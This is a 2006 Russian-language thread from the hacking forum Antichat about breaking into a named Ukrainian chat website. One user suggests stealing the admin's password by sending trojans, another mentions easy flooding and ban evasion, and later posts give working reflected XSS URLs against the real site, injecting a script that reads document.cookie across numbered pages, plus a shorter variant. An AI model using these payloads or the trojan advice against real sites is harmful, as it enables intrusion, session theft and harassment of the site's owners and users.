Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   http://chatinet.zp.ua/ (https://forum.antichat.xyz/showthread.php?t=25729)

olhov 21.10.2006 17:25

http://chatinet.zp.ua/
 
http://chatinet.zp.ua/ кто нибудь знает чтото о нем???

Nova 21.10.2006 18:43

нет там нечего =)
и драствуй земляк =)

-SMith- 21.10.2006 19:08

Попробуй добыть пароль у админа, кинь пару троянчиков)

TANZWUT 22.10.2006 10:31

Флуд без проблем :)
банан обходится легко.

nc.STRIEM 24.10.2006 00:48

Мне этот чат знаком до боли...
Уже незнаю скок раз пытался там баги найти!!! Не нашол нчего, все че получалось это ток флуд))
че могу сказать, чат действительно клево сделан (я имею ввиду безопасность)
ну есле кто чего найдет, поделитесь будет очень интересно!
Цитата:

Сообщение от Nova
и драствуй земляк =)

тебе тож драсте )))

.Slip 25.10.2006 21:49

Цитата:

Сообщение от Nova
нет там нечего =)

Да? :D
http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cook ie)</script>

.Slip 25.10.2006 21:54

upd
http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cookie)</script>
Заменяем 001, на:
002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016.
Везде там xss:)

nikitos 26.10.2006 03:40

Плохой из тебя хакер )
http://chatinet.zp.ua/winter2005/party/?"><script>alert(document.cookie)</script>

так тоже можно и короче..
а вообще хсс не должен выдовать данные которыми могут воспользоваться в злосных целях..

nc.STRIEM 27.10.2006 23:32

а понту с этих Xss они не в профиле, там куки не передаються


Время: 00:54